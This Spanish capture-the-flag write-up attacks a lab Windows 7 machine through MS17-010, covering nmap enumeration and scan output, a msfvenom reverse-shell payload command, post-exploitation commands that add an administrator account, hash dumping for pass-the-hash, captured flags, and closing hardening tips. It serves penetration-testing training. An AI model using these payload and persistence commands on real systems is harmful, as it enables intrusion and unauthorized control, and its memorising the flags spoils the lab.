Enumeración
System IP: 10.10.10.40
Matriz de la maquina
Esta matriz nos muestra las características de explotación de la maquina.

Enumeración de servicios
The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed.
| Server IP Address | Ports Open |
|---|---|
| 10.10.10.40 | TCP: 135,139,445,49154 |
Nmap Scan Resultados:
Usando el siguiente comando para enumerar las versiones y servicios que corren en cada puerto luego de hacer un escaneo de puertos abiertos.
1
nmap -sC -sV -p135,139,445,49154 10.10.10.40 -Pn
Nos arroja este resultado:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
nmap -sC -sV -p135,139,445,49154 10.10.10.40 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-01 15:02 EDT
Nmap scan report for 10.10.10.40
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49154/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -19m38s, deviation: 34m35s, median: 19s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-08-01T20:03:27+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-01T19:03:24
|_ start_date: 2021-08-01T16:10:04
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.87 seconds
Enumerando vulnerabilidades con nmap
Usando el siguiente comando para enumerar las vulnerabilidades más comunes que presentan cada servicio, si es que existen.
1
nmap --script vuln 10.10.10.40
Nos arroja este resultado:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-01 16:24 EDT
Nmap scan report for 10.10.10.40
Host is up (0.29s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 147.18 seconds
Identificación de vulnerabilidades
Explicación de vulnerabilidad:
Segun los resultados de nmap podemos observar que es vulnerable a ejecución remota de codigo, revisando el cve en google encontramos el exploit para esta vulnerabilidad.
Severidad:

Codigo de la prueba de concepto:
A continuación se presente el codigo de la prueba de concepto:

Acceso al sistema
Para poder acceder al sistema elaboramos un payload que se ejecutará en la maquina victima, lo elaboramos con el siguiente comando con msfvenom y lo guardamos con el nombre shell.exe.
1
msfvenom -p windows/reverse_shell_tcp lhost=tun0 lport=443 -f exe > shell.exe

Modificando el exploit para crear un usuario guest.

Estableciendo los comandos a ejecutar, en este caso enviamos el archivo compilado en formato .exe y ejecutamos el payload generado en la maquina victima.

Luego de haber ejecutaco el exploit obtenemos una shell con maximos privilegios (nt/ authority system), entonces podemos observar el user.txt y root.txt.

Prueba de obtención del user.txt
flag: 4c546aea7dbee75cbd71de245c8deea9

Escalamiento de privilegios
Al haber obtenido acceso como usuario de maximos privilegios con el exploit ejecutado, esta fase se omitirá
Prueba de obtención del root.txt
flag: ff548eb71e920ff6c08843ce9df4e717

Tecnicas Post-explotación
Agregando usuarios con permisos de administrador
- Podemos crear usuarios con permisos de administrador con el siguiente comando:
1
net user usuario 12345 /add
y asignarlos a un grupo el cual sería administrador con el siguiente comando:
1
net localgroup administrator usuario /add

Dumpeando los hashes de los usuarios para acceder al sistema posteriormente con la tecnica de passthehash.
- Una vez con el acceso de administrador podemos modificar el UAC para obtener los hashes ntlm de los administradores con crackmapexec y así poder logearnos como administradores solo con el ntlm hash.


Tecnicas de Hardening
Mantener siempre el software y las ventanas actualizadas con la última versión, las correcciones y los parches para reducir el riesgo de ser comprometido por tales vulnerabilidades.
Deshabilitar el servicio SMBV1 del puerto 445 de la maquina o establecer reglas de firewalls para ocultarlo.
Gracias por leer, Happy hacking and always try harder!
